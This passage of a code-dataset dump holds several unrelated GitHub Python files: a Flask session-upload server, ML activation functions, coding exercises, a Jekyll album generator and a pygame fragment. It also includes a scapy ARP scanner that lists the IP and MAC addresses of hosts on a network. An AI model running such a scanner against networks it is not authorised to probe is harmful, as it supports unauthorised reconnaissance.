'User not found'\n app.logger.warning(\"User %s not found.\"%(username))\n else:\n resp['login_result'] = 'OK'\n resp['user_id'] = row['user_id']\n app.logger.info(\"User %s logged in successfully.\"%(\n username))\n\n return jsonify(resp)\n\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'login_result':'ERROR'})\n\n#########################################\n\ndef level_by_exp(exp):\n exp_obj = {}\n 
exp_obj['experience'] = exp\n level = 0\n next_level_exp = 0\n for needed in _exp_needed:\n if exp >= needed:\n level += 1\n exp -= needed\n else:\n next_level_exp = needed - exp\n break\n exp_obj['level'] = level\n exp_obj['next_level_exp'] = next_level_exp\n return exp_obj\n\n@app.route(\"/upload\", methods=['POST'])\ndef upload():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403)\n \n user_id = request.form['user_id']\n mode_id = request.form['mode_id']\n bps = request.form['bps']\n total_time = request.form['total_time']\n total_score = request.form['total_score']\n active_chars = request.form['active_characters'].encode('utf-8')\n active_pids = request.form['active_protoset_ids'].encode('utf-8')\n session_json = request.form['session_json'].encode('utf-8')\n\n con = g.db_con \n cur = con.cursor(cursorclass=mdb.cursors.DictCursor)\n cur.execute(\"\"\"\n INSERT INTO sessions\n (user_id, mode_id, bps, total_time,\n total_score, session_json, \n active_protoset_ids, active_characters)\n VALUES\n (%s,%s,%s,%s,%s,%s,%s,%s);\n \"\"\", (user_id, mode_id, bps, total_time, \n total_score, session_json,\n active_pids, active_chars))\n\n session = json.loads(session_json)\n session['sessionID'] = con.insert_id()\n \n # update exp and level\n if int(mode_id) == RACE_MODE_ID:\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT experience FROM users WHERE user_id=%s\n \"\"\",(user_id,))\n row = cur.fetchone()\n exp = level_by_exp(row[0] + float(bps))\n\n cur = con.cursor()\n cur.execute(\"\"\"\n UPDATE users \n SET experience=%s, level=%s, next_level_exp=%s\n WHERE user_id=%s\n \"\"\", (exp['experience'],\n exp['level'],\n exp['next_level_exp'],\n user_id))\n\n ##################################\n # Queue the process_session task #\n ################################## \n q = Queue('normal', connection=Redis())\n q.enqueue(process_session, session)\n \n app.logger.info(\"User %s uploaded a session\"%(user_id))\n\n return jsonify({'Error':0})\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'Error':1})\n\n#########################################\n\nif __name__ == \"__main__\":\n # parse arguments\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', default=8000, type=int,\n help='port to listen (default: 8000)')\n args = parser.parse_args()\n \n # set up logger\n import logging.handlers as lh\n app.logger_name = 'uright'\n app.logger.setLevel(logging.INFO)\n formatter = logging.Formatter('%(name)s: %(message)s')\n syslog_handler = lh.SysLogHandler(address='/dev/log')\n syslog_handler.setFormatter(formatter)\n app.logger.addHandler(syslog_handler)\n\n app.run(host='127.0.0.1', port=args.port)\n","repo_name":"sunsern/uright-server","sub_path":"uright-server.py","file_name":"uright-server.py","file_ext":"py","file_size_in_byte":13146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73565266613","text":"from PyQt5.QtWidgets import QDialog\nfrom ui.ui_integer_spin_dialog import Ui_IntegerSpinDialog\n\nclass IntegerSpinDialog(QDialog, Ui_IntegerSpinDialog):\n def __init__(self):\n QDialog.__init__(self)\n Ui_IntegerSpinDialog.__init__(self)\n self.setupUi(self)\n \n def exec_(self):\n previous = self.spinBox.value()\n result = super().exec_()\n \n if result == self.Rejected:\n self.spinBox.setValue(previous)\n \n return result\n 
","repo_name":"enjoysmath/abstract-spacecraft","sub_path":"dialog/integer_spin_dialog.py","file_name":"integer_spin_dialog.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70104116534","text":"# -*- coding: utf-8 -*-\n'''\nauthor: ysoftman\npython version : 3.x\ndesc : 활성화 함수 테스트\n'''\n# pip3 install numpy matplotlib\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\n# step(스텝)\n# 계단 모양으로 입력이 0 이하면 0(비활성화) 0이상이면 1(활성화)\ndef step(x):\n # dtype 옵션으로 bool 결과를 int 변환해야 한다.\n return np.array(x > 0, dtype=int)\n\n\n# sigmoid(시그모이드)\n# s 모양으로 출력이 점진적으로 커진다.\n# y = 1 / (1 + (자연상수e ** -x))\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\n# ReLU(렐루)\n# 입력이 0이하면 0, 0 초과하면 입력값 그대로 출력(활성화)\ndef relu(x):\n return np.maximum(0, x)\n\n\n# softmax(소프트맥스)\n# 훈련시 출력 레이어에서 사용한다.\n# 각 노드 출력을 전체 1.0 에 대한 비율(확률)로 계산한다.\ndef softmax(x):\n if x.ndim == 2:\n x = x.T\n x = x - np.max(x, axis=0)\n y = np.exp(x) / np.sum(np.exp(x), axis=0)\n return y.T\n x = x - np.max(x) # 오버플로 방지하기 가장 높은 값과의 차이만을 취한다.\n return np.exp(x) / np.sum(np.exp(x))\n\n\ndef graph(x, y, title):\n # set range y\n plt.ylim(-0.1, 1.1)\n # change windows title\n fig = plt.gcf()\n fig.canvas.set_window_title(title)\n # set x, y value\n plt.plot(x, y)\n # show graph\n plt.show()\n\n# 입력 x 값들에 대해서 활성화(출력 0이상)화 판단\nif __name__ == \"__main__\":\n x = np.arange(-5, 5, 0.1)\n y = step(x)\n print (x)\n print (y)\n graph(x, y, \"step function\")\n\n y = sigmoid(x)\n print (y)\n graph(x, y, \"sigmoid function\")\n\n y = relu(x)\n print (y)\n graph(x, y, \"relu function\")\n\n\n y = softmax(x)\n print (y)\n graph(x, y, \"softmax function\")\n","repo_name":"ysoftman/test_code","sub_path":"MachineLearning/activation_function.py","file_name":"activation_function.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40928207738","text":"# Задача-2: Исходные значения двух переменных запросить у пользователя.\n# Поменять значения переменных местами. Вывести новые значения на экран.\n# Решите задачу, используя только две переменные.\n# Подсказки:\n# * постарайтесь сделать решение через действия над числами;\n\n\nmsg = 'Введите значения переменных'\nerr_msg = 'Что-то пошло не так. Попробуем еще раз.'\nok_msg = 'Получилось!'\nis_sys_err = 0\nis_usr_err = 0\nx = 0\n\nis_a_ok = 0\nis_b_ok = 0\nprint(msg)\nwhile not(is_a_ok == 1 and is_b_ok == 1):\n try:\n if is_a_ok == 0:\n a = float(input('a: '))\n is_a_ok = 1\n if is_b_ok == 0:\n b = float(input('b: '))\n is_b_ok = 1\n except:\n print(err_msg)\nprint(ok_msg, 'a = ', a,', b = ', b)\nprint('Поменыем значения переменных местами ', )\na = a + b\nb = a - b\na = a - b\nprint('a = ', a, ', b = ', b)\nprint('---------------------------------------------------')\n","repo_name":"MariaMF77/python","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16968512237","text":"from collections import deque\nimport sys\nsys.setrecursionlimit(10**6)\n\n# 지도의 'X'는 바다, 숫자는 무인도\n# 상 하 좌 우 해당 무인도에서 최대 며칠 동안 머물 수 있는가\n# 최대 몇일? 
배열에 오름차순으로 담아 return\n# 지낼 수 있는 것이 없다면 -1을 배열에 담아 return\n# dfs, bfs로 풀 수 있을 듯\n\ndef solution(maps):\n    \n    def bfs(x, y, days_cnt):\n        \n        queue = deque([(x, y)])\n        while queue:\n            r, c = queue.popleft()\n            for idx in range(4):\n                nx = r + dx[idx]\n                ny = c + dy[idx]\n                if -1 < nx < N and -1 < ny < M:\n                    if matrix[nx][ny] != 'X' and not visited[nx][ny]:\n                        days_cnt += int(matrix[nx][ny])\n                        visited[nx][ny] = True\n                        queue.append((nx, ny))\n        \n        return days_cnt\n    \n    answer = []\n\n    N = len(maps)\n    M = len(maps[0])\n    dx = [-1, 1, 0, 0]\n    dy = [0, 0, -1, 1]\n\n    matrix = [list(elements) for elements in maps]\n    visited = [[False] * M for _ in range(N)]\n\n    for i in range(N):\n        for j in range(M):\n            days_cnt = 0\n            if not visited[i][j] and matrix[i][j] != 'X':\n                days_cnt += int(matrix[i][j])\n                visited[i][j] = True\n                answer.append(bfs(i, j, days_cnt))\n    \n    \n    if len(set(answer)) == 0:\n        return [-1]\n    \n    else:\n        return sorted(answer)\n    ","repo_name":"wdahlia/Python-Algorithm","sub_path":"프로그래머스/PG_무인도여행.py","file_name":"PG_무인도여행.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"17540524683","text":"'''\nCreated on 5 Jul 2020\n\nModified 29 Sep 2022\n\n@author: thomasgumbricht\n\nNotes\n-----\nThe module jekyllalbum.py:\n\n    requires that you have ImageMagick set up for your machine, that you have the SoSimple (v 2) Jekyll theme,\n    and a json file for parameters linking to a txt file listing the photos to import. \n    \n    The script takes 2 string parameters as input:\n    \n    - docpath: the full path to a folder that must contain the txt file as given by the \"projFN\" parameter\n    - projFN: the name of an existing txt file that sequentially lists json parameter files to run\n    \n    \n    The individual parameter files (listed in \"projFN\") must have approximately 40 parameters \n    in a precise nested json structure with dictionaries and lists.\n    You can create a template json parameter file by running \"def CreateParamJson\" (just uncomment it under \"def SetupProcesses\");\n    this creates a template json parameter file called \"jekyll_album_4_Jekyll-theme_SoSimple.json\" in the \n    path given as the parameter \"docpath\".\n    \n    The script first runs the stand-alone \"def SetupProcesses\" that reads the txt file \"projFN\" and \n    then sequentially runs the json parameter files listed. \n    \n    Each album creation (i.e. each json parameter file) is run as a sequence of commands:\n    \n    - JekyllYaml: creates the markdown yaml header\n    - FigClass: processes the listed images using ImageMagick\n    - MagickConvertFull: converts images using ImageMagick\n    - MagickConvertPage: creates reduced resolution images from MagickConvertFull if requested\n    - WritePost: writes the markdown for the Jekyll theme SoSimple (v2).\n    \n'''\n\n# Standard library imports\n\nimport sys\n\nimport os\n\nimport subprocess\n\n# Third party imports\n\nimport json\n\nfrom PIL import Image\n\nfrom PIL.ExifTags import TAGS\n\ndef JekyllAlbumJson():\n    \"\"\" Create a template dictionary for parametrising this script\n    \n    \n    :returns: template parameters \n    :rtype: dict\n    \n    \"\"\"\n    \n    paramD = {\n        \"overwrite\": True,\n        \"media\": {\n            \"srcfp\": \"path/to/image/library\",\n            \"listfn\": \"album.txt\",\n            \"labelsfn\": False,\n            \"magickfn\": False\n        },\n        \"urlimages\": {\n            \"xdim\": 1200,\n            \"ydim\": 0,\n            \"kind\": \"jpg\",\n            \"quality\": 80,\n            \"suffix\": \"m\"\n        },\n        \"inpageimages\": {\n            \"xdim\": 300,\n            \"ydim\": 0,\n            \"kind\": \"jpg\",\n            \"quality\": 70,\n            \"suffix\": \"s\"\n        },\n        \"imagemagick\": {\n            \"convert\": {\n                \"-auto-gamma\": \"\"\n            },\n            \"dissolve\": 50,\n            \"alpha\": 0,\n            \"emboss\": False,\n            \"watermark\": {\n                \"-font\": \"Arial\",\n                \"-pointsize\": \"250\",\n                \"-gravity\": \"center\",\n                \"-draw\": \"fill 'RGBA(32,32,64,0.25)' text 2,2 'KARTTUR' fill 'RGBA(255,255,255,0.25)' text -2,-2 'EMBOSS' fill grey text 0,0 'EMBOSS' \",\n                \"-transparent\": \"grey\",\n                \"-fuzz\": \"90%\"\n            }\n        },\n        \"metadata\": {\n            \"author\": \"Author Name\",\n            \"datetime\": \"YYYYMMDD\",\n            \"country\": \"country\",\n            \"location\": \"Placename(s)\",\n            \"movemode\": \"foot\",\n            \"lon\": 18.080822,\n            \"lat\": 59.374705,\n            \"elev\": -999,\n            \"yaw\": 0,\n            \"pitch\": 0,\n            \"roll\": 0\n        },\n        \"content\": {\n            \"rolltitle\": \"title\",\n            \"figcaption\": \"figure caption. 
\",\n \"description\": \"short desicription.\",\n \"persons\": [\n \"N N\",\n \"M M\"\n ],\n \"keywords\": [\n \"key1\",\n \"key2\",\n \"key3\"\n ]\n },\n \"publication\": {\n \"quality\": 3,\n \"public\": 2,\n \"paltyp\": 2,\n \"figclass\": \"third\",\n \"layout\": \"post\",\n \"categories\": \"existing category in you SoSimple structure\",\n \"dstfp\": \"destination folder of your local SoSimple setup\"\n }\n }\n \n return (paramD)\n\ndef CreateParamJson(docpath):\n \"\"\" Create the default json parameters file structure, only to create template if lacking\n \n :param str docpath: directory path \n \"\"\"\n \n # Get the default params\n paramD = JekyllAlbumJson()\n \n # Set the json FPN\n jsonFPN = os.path.join(docpath, 'jekyll_album_4_Jekyll-theme_SoSimple.json')\n \n # Dump the paramD as a json object\n jsonF = open(jsonFPN, \"w\")\n \n json.dump(paramD, jsonF, indent = 2)\n \n jsonF.close()\n\ndef JekyllYaml(pD):\n \"\"\" Build the Jekyll album Yaml header\n \n :param pD: album parameters\n :type pD: dict\n \n :returns: yaml header \n :rtype: list\n \"\"\"\n\n yamlDate = '%(y)s-%(m)s-%(d)s' %{'y':pD['metadata']['datetime'][0:4], \n 'm':pD['metadata']['datetime'][4:6],\n 'd':pD['metadata']['datetime'][6:8]}\n \n yamlL = ['---', 'layout: %s' % pD['publication']['layout'], \n 'title: %s' % pD['content']['rolltitle'],\n 'categories: %s' % pD['publication']['categories'], \n 'excerpt: %s' % pD['content']['description'],\n 'tags:']\n \n for item in pD['content']['keywords']:\n \n yamlL.append(' - %s' % item)\n \n yamlL.extend( ['date: %s' % yamlDate, \n 'modified: %s' % yamlDate,\n 'comments: true', \n 'share: true', '---' ] )\n \n return yamlL\n\n\n \ndef GetImageMeta(srcImageFPN, dstJsonMetaFPN):\n \"\"\" Retrieve image exifdata (metadata) using PIL, write to json file and return\n \n :param srcImageFPN: path to image source file\n :type srcImageFPN: str\n \n :param dstJsonMetaFPN: path to destination metadata file\n :type dstJsonMetaFPN: str\n \n :returns: meatadata \n :rtype: dict\n \"\"\"\n \n metaD = {}\n img = Image.open(srcImageFPN)\n \n exifdata = img.getexif()\n \n for tag_id in exifdata:\n \n # get the tag name, instead of human unreadable tag id\n tag = TAGS.get(tag_id, tag_id)\n \n data = exifdata.get(tag_id)\n \n # decode bytes \n if isinstance(data, bytes):\n \n data = data.decode()\n \n metaD[tag] = data\n \n metaxD = {}\n \n for tag in metaD:\n \n if isinstance(metaD[tag], str): \n \n metaD[tag] = metaD[tag].rstrip('\\x00')\n \n if len(metaD[tag]) == 0:\n \n continue \n \n elif isinstance(metaD[tag], int): \n \n metaD[tag] = int(str(metaD[tag]))\n \n elif isinstance(metaD[tag], float): \n \n metaD[tag] = float(str(metaD[tag]))\n \n else:\n \n continue\n \n metaxD[tag] = metaD[tag]\n \n jsonF = open(dstJsonMetaFPN, \"w\")\n \n json.dump(metaxD, jsonF, indent = 2)\n \n jsonF.close()\n \n return metaxD\n \ndef MagickConvertPage(pD, dstFullFPN, dstPageFPN):\n \"\"\" ImageMagick reduction of size and quality of the destination image to a smaller, in-page image\n \n :param pD: process parameters\n :type pD: dict\n \n :param dstFullFPN: path to larger, existing (url-linked) destination image\n :type dstFullFPN: str\n \n :param dstPageFPN: path to smaller (in-page) destination image\n :type dstPageFPN: str\n \"\"\"\n \n #Here is the conversion\n if int(pD['inpageimages']['xdim']) and int(pD['inpageimages']['ydim']):\n \n resize = '%sx%s' %(pD['inpageimages']['xdim'], pD['inpageimages']['ydim'])\n \n elif int(pD['inpageimages']['xdim']):\n \n resize = '%sx' 
%(pD['inpageimages']['xdim'])\n \n elif int(pD['inpageimages']['ydim']):\n \n resize = 'x%s' %(pD['inpageimages']['ydim'])\n \n else:\n \n resize = False\n \n quality = str(pD['inpageimages']['quality'])\n \n cmdL = ['/usr/local/bin/convert', '-resize', resize, '-quality', quality, dstFullFPN, dstPageFPN]\n \n subprocess.run(cmdL)\n\ndef MagickConvertFull(pD, srcImageFPN, dstFullFPN, tempFPN):\n \"\"\" Process image source using ImageMAgick and save to destination path(s)\n \n :param pD: process parameters\n :type pD: dict\n \n :param srcImageFPN: path to the source image\n :type srcImageFPN: str\n \n :param dstFullFPN: path to larger (url-linked) destination image\n :type dstFullFPN: str\n \n :param tempFPN: path to temporary image file\n :type tempFPN: str\n \"\"\"\n #Here is the conversion\n if int(pD['urlimages']['xdim']) and int(pD['urlimages']['ydim']):\n \n resize = '%sx%s' %(pD['urlimages']['xdim'], pD['urlimages']['ydim'])\n \n elif int(pD['urlimages']['xdim']):\n \n resize = '%sx' %(pD['urlimages']['xdim'])\n \n elif int(pD['urlimages']['ydim']):\n \n resize = 'x%s' %(pD['urlimages']['ydim'])\n \n else:\n \n resize = False\n \n quality = str(pD['urlimages']['quality'])\n \n if pD['imagemagick']:\n \n convertCmd = []\n \n for k,v in pD['imagemagick']['convert'].items():\n convertCmd.append(k)\n if v:\n convertCmd.append( str(v) )\n \n convertCmd = ','.join(convertCmd)\n\n else:\n \n convertCmd = False\n \n if resize: \n \n if convertCmd:\n \n cmdL = ['/usr/local/bin/convert', '-resize', resize, convertCmd, '-quality', quality, srcImageFPN, dstFullFPN]\n \n else:\n cmdL = ['/usr/local/bin/convert', '-resize', resize, '-quality', quality, srcImageFPN, dstFullFPN]\n \n else: \n if convertCmd:\n \n cmdL = ['/usr/local/bin/convert', convertCmd, '-quality', quality, srcImageFPN, dstFullFPN]\n \n else:\n cmdL = ['/usr/local/bin/convert', '-quality', quality, srcImageFPN, dstFullFPN]\n\n subprocess.run(cmdL)\n \n if pD['imagemagick']['dissolve']:\n \n # Resize the original images\n cmdL = ['/usr/local/bin/convert', '-resize', resize, srcImageFPN, tempFPN]\n \n subprocess.run(cmdL)\n \n # composite the old and new image with the dissolve set\n cmdL = ['/usr/local/bin/composite', '-dissolve', str(pD['imagemagick']['dissolve']), tempFPN, dstFullFPN, dstFullFPN];\n \n subprocess.run(cmdL)\n \n if pD['imagemagick']['alpha']:\n \n pass\n # Not yet implemented\n \n if pD['imagemagick']['emboss']:\n \n img = Image.open(dstFullFPN)\n \n # get width and height\n w = img.width\n \n h = img.height\n\n cmdL = ['/usr/local/bin/convert', '-size', '%sx%s' %(w,h), 'xc:none',]\n \n for k,v in pD['imagemagick']['watermark'].items():\n\n cmdL.append( k )\n cmdL.append( v )\n \n cmdL.append( tempFPN )\n\n subprocess.run(cmdL)\n \n # Composite the embossed text and the fixed image \n cmdL = ['/usr/local/bin/composite', tempFPN, dstFullFPN, dstFullFPN];\n \n subprocess.run(cmdL)\n \ndef FigClass(pD, jsonFPN):\n \"\"\" Process figures (images, photos) using ImageMagick\n \n :param pD: parameters for creating jekyll album\n :type pD: dict\n \n :param jsonFPN: path to json parameter file\n :type jsonFPN: str\n \n :return bodyL: markdown body text\n :rtype bodyL: list\n \"\"\"\n \n srcFP, rollName = os.path.split(jsonFPN)\n \n rollName = os.path.splitext(rollName)[0]\n \n bodyL = []\n \n heading1 = '#### %s' %(pD['content']['description'])\n \n bodyL.append(heading1)\n \n who = '%s %s' %( '**Who:**', ', '.join(pD['content']['persons']) )\n \n bodyL.append(who)\n \n where = '**Where :** %s (%s)' %( 
pD['metadata']['location'], pD['metadata']['country'])\n    \n    bodyL.append(where)\n    \n    bodyL.append('Mouse over the images to highlight, click to see larger pop-up images.')\n    \n    if pD['publication']['figclass'] in ['1', 'single', 'none', 'None', 'NA', 'na']:\n        bodyL.append('<figure>')\n        \n    elif pD['publication']['figclass'] == 'half':\n        bodyL.append(\"<figure class='half'>\")\n        \n    elif pD['publication']['figclass'] == 'third':\n        bodyL.append(\"<figure class='third'>
\")\n \n else:\n sys.exit('unknown figclass')\n \n # Create target folder\n tarFP = pD['publication']['dstfp']\n \n photoFP = os.path.join(tarFP,'photos')\n \n rollFP = os.path.join(photoFP,rollName)\n \n if not os.path.exists(rollFP):\n os.makedirs(rollFP)\n \n # Get the list of images\n listFPN = os.path.join(pD['media']['srcfp'], pD['media']['listfn'])\n \n with open(listFPN) as file:\n \n lines = file.readlines()\n \n lines = [line.rstrip() for line in lines]\n \n for file in lines:\n \n srcImageFPN = file\n \n FN = os.path.split(file)[1]\n \n dstFullFN = dstPageFN = '%s_%s_%s.%s' %(rollName, \n pD['urlimages']['suffix'], \n os.path.splitext(FN)[0], \n pD['urlimages']['kind'])\n \n dstjsonMetaFN = '%s_%s_%s.json' %(rollName, \n 'meta',\n os.path.splitext(FN)[0] )\n \n \n dstFullFPN = dstPageFPN = os.path.join(rollFP,dstFullFN)\n \n dstjsonMetaFPN = os.path.join(rollFP,dstjsonMetaFN)\n \n # Get the image meta data\n metaD = GetImageMeta(srcImageFPN,dstjsonMetaFPN)\n \n tempPFN = os.path.join(rollFP,'temp.png')\n \n if not os.path.isfile(dstFullFPN) or pD['overwrite']:\n \n MagickConvertFull(pD,srcImageFPN, dstFullFPN,tempPFN)\n \n if pD['inpageimages'] != pD['urlimages']:\n \n dstPageFN = '%s_%s_%s.%s' %(rollName, \n pD['inpageimages']['suffix'],\n os.path.splitext(FN)[0],\n pD['inpageimages']['kind'])\n \n dstPageFPN = os.path.join(rollFP,dstPageFN)\n \n if not os.path.isfile(dstPageFPN) or pD['overwrite']:\n \n MagickConvertPage(pD, dstFullFPN, dstPageFPN)\n\n bodyL.append('\"image\"' %{'fp':rollName, 'fullfn':dstFullFN, 'qlfn':dstPageFN}) \n\n #bodyL.append('%(meta)s' %{'fp':rollName, 'jsonfn':dstjsonMetaFN, 'meta':metaD['DateTime']}) \n\n bodyL.append(\"
<figcaption>%s</figcaption>\" %(pD['content']['figcaption']))\n        \n    bodyL.append(\"</figure>
\") \n \n return bodyL\n\ndef WritePost(pD, jsonFPN, yamlL, bodyL):\n \"\"\" Write the album post as a markdown file\n \n :param pD: parameters for creating jekyll album\n :type pD: dict\n \n :param jsonFPN: path to json parameter file\n :type jsonFPN: str\n \n :param yamlL: markdown yaml text lines\n :type pD: list\n \n :param bodyL: markdown body text lines\n :type bodyL: list\n\n \"\"\"\n\n yamlDate = '%(y)s-%(m)s-%(d)s' %{'y':pD['metadata']['datetime'][0:4], \n 'm':pD['metadata']['datetime'][4:6],\n 'd':pD['metadata']['datetime'][6:8]}\n\n year = pD['metadata']['datetime'][0:4]\n \n rollName = os.path.split(jsonFPN)[1]\n \n rollName = os.path.splitext(rollName)[0]\n \n # Create target folder\n tarFP = pD['publication']['dstfp']\n \n yearFP = os.path.join(tarFP,'_posts',year)\n \n if not os.path.exists(yearFP):\n os.makedirs(yearFP)\n \n postFN = '%s-%s.md' %(yamlDate, rollName)\n \n postFPN = os.path.join(yearFP, postFN)\n \n if not os.path.isfile(postFPN) or pD['overwrite']:\n\n f = open(postFPN, 'w')\n \n for row in yamlL:\n \n f.write (row)\n \n f.write ('\\n')\n \n f.write ('\\n')\n \n for row in bodyL:\n \n f.write ('\\n')\n \n f.write (row)\n \n f.write ('\\n')\n \ndef PilotJekyllAlbum(jsonFPN):\n \"\"\" Create Jekyll photo album from json command file\n\n :param jsonFPN: path to xml file\n :type jsonFPN: str\n \"\"\"\n \n # Parse the json file\n with open(jsonFPN) as jsonF:\n \n pD = json.load(jsonF)\n \n # Create the Jekyll Yaml \n yamlL = JekyllYaml(pD)\n \n # Create the markdown \n bodyL = FigClass(pD, jsonFPN)\n \n WritePost(pD, jsonFPN, yamlL, bodyL)\n \ndef SetupProcesses(docpath, projFN): \n '''Setup and loop processes\n \n :paramn docpath: path to text file \n :type: lstr\n \n :param projFN: project filename\n :rtype: str\n \n '''\n \n ''' CreateParamJson creates the default json structure for running the python script, \n only use it to create a backbone then edit \n \n CreateParamJson(docpath)\n '''\n \n srcFP = os.path.join(os.path.dirname(__file__),docpath)\n\n projFPN = os.path.join(srcFP,projFN)\n\n # Get the full path to the project text file\n dirPath = os.path.split(projFPN)[0]\n\n if not os.path.exists(projFPN):\n\n exitstr = 'EXITING, project file missing: %s' %(projFPN)\n\n exit( exitstr )\n\n infostr = 'Processing %s' %(projFPN)\n\n print (infostr)\n\n # Open and read the text file linking to all json files defining the project\n with open(projFPN) as f:\n\n jsonL = f.readlines()\n\n # Clean the list of json objects from comments and whithespace etc\n jsonL = [os.path.join(dirPath,x.strip()) for x in jsonL if len(x) > 10 and x[0] != '#']\n\n #Loop over all json files and create Schemas and Tables\n for jsonObj in jsonL:\n \n print ('jsonObj:', jsonObj)\n \n PilotJekyllAlbum(jsonObj)\n \nif __name__ == '__main__':\n \"\"\"\n \"\"\"\n \n docpath = \"/Volumes/karttur/bilder/se\"\n \n projFN = (\"jekyllalbums_se.txt\")\n \n SetupProcesses(docpath, projFN)\n ","repo_name":"karttur/pyscripts","sub_path":"jekyllalbum/jekyllalbum.py","file_name":"jekyllalbum.py","file_ext":"py","file_size_in_byte":18599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8043434044","text":"import math\ndef calc_area(points_list: list[tuple]) -> float:\n # Using area formula from: https://www.mathopenref.com/coordpolygonarea.html\n if len(points_list) < 3:\n return 0\n prev_point = points_list[-1]\n sum = 0\n for point in points_list:\n part = prev_point[0] * point[1] - prev_point[1] * point[0]\n sum += part\n prev_point = 
point\n sum /= 2\n area = abs(sum)\n return area\n\nif __name__ == '__main__':\n n = int(input(\"Input number of points: \"))\n polygon = []\n for i in range(n):\n x = float(input(f\"Point[{i + 1}].X = \"))\n y = float(input(f\"Point[{i + 1}].Y = \"))\n polygon.append((x, y))\n if i > 0:\n print(f\"Side[{i}] = {math.sqrt((x - previous[0])**2 + (y - previous[1])**2)}\")\n previous = (x, y)\n print(f\"Area of {polygon} is: {calc_area(polygon)}\")\n # polygons = [\n # [(0, 0), (0, 7), (4, 7), (4, 0)],\n # [(2, 2), (11, 2), (9, 7), (4, 10)]\n # ]\n # for poly in polygons:\n # print(calc_area(poly))\n","repo_name":"iproduct/intro-python","sub_path":"01-up-2022-lab/calculate_area.py","file_name":"calculate_area.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"4736539033","text":"# -*- coding: utf-8 -*-\r\n# producer: 王健吉(leimilia)\r\n\r\ndef get_config():\r\n with open('config.ini', 'r', encoding='utf-8-sig') as obj:\r\n info = obj.readlines()\r\n\r\n str_info = str(info[0])\r\n dict_info = eval(str_info)\r\n return dict_info\r\n\r\n\r\nclass Trans():\r\n def __init__(self):\r\n dict_info = get_config()\r\n self.user_name = dict_info['config']['username']\r\n self.user_pwd = dict_info['config']['passpwd']\r\n self.host = dict_info['config']['host']\r\n self.port = dict_info['config']['port']\r\n self.sid = dict_info['config']['sid']\r\n self.database_address = None\r\n\r\n self.ver = None\r\n self.row_count = 5\r\n\r\n def reset_all_trans(self):\r\n self.user_name = None\r\n self.user_pwd = None\r\n self.host = None\r\n self.port = None\r\n self.sid = None\r\n self.database_address = None\r\n\r\n def get_database_address(self):\r\n self.database_address = str(self.host) + ':' + str(self.port) + '/' + str(self.sid)\r\n return self.database_address","repo_name":"sola1121/the_stock_work","sub_path":"trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39358568528","text":"import os \r\n\r\ndef rename_files():\r\n #1 get files names from folder\r\n file_list=os.listdir(r\"C:\\Users\\manis\\Downloads\\prank\") \r\n print (file_list)\r\n saved_path=os.getcwd()\r\n print(\"current working directory\"+saved_path) \r\n os.chdir(r\"C:\\Users\\manis\\Downloads\\prank\")\r\n #2 for each file rename filename\r\n remove=\"123456789\" \r\n table=str.maketrans(\"\",\"\",remove) \r\n for file_name in file_list: \r\n os.rename(file_name,file_name.translate(table)) \r\n\r\n\r\nrename_files()\r\n","repo_name":"manish4487/Python-Mini-Projects-Udacity-Coursework-","sub_path":"Secret message/rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34809063166","text":"#!/usr/bin/env python3\nimport scapy.all as scapy\nimport optparse\ndef get_arg():\n parse=optparse.OptionParser()\n parse.add_option(\"-t\",\"--target\", dest=\"target\", help=\"Takes the target IP\")\n return parse.parse_args()\n\ndef scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=0)[0]\n clients_list=[]\n for element in answered_list:\n client_dict={\"ip\":element[1].psrc, \"mac\":element[1].hwsrc}\n 
clients_list.append(client_dict)\n return clients_list\n\ndef print_result(result_list):\n print(\"IP\\t\\tMAC Address\", end=\"\\n_________________________________________________\\n\")\n for element in result_list:\n print(element[\"ip\"]+\"\\t\"+element[\"mac\"])\noptions = get_arg()[0]\nclient_list = scan(options.target)\nprint_result(client_list)","repo_name":"Anshuman-Raj/Network-Scanner","sub_path":"Network_Scanner.py","file_name":"Network_Scanner.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28683091106","text":"import pygame\r\nimport carMod\r\nimport random\r\n\r\n\r\npygame.init()\r\n\r\nscreenSize = (800, 500)\r\nscreen = pygame.display.set_mode(screenSize)\r\nclock = pygame.time.Clock()\r\nfont = pygame.font.SysFont(None, 24)\r\n\r\ncarImage = pygame.image.load(\"car.png\")\r\ntrackImage = pygame.image.load(\"track.png\")\r\n\r\nplayerCar = carMod.Car(5,pygame.Vector2((100, 100)) ,carImage, (255, 0, 0))\r\n\r\ntrackMask = trackImage.convert()\r\ntrackMask.set_colorkey((255,255,255))\r\nmask = 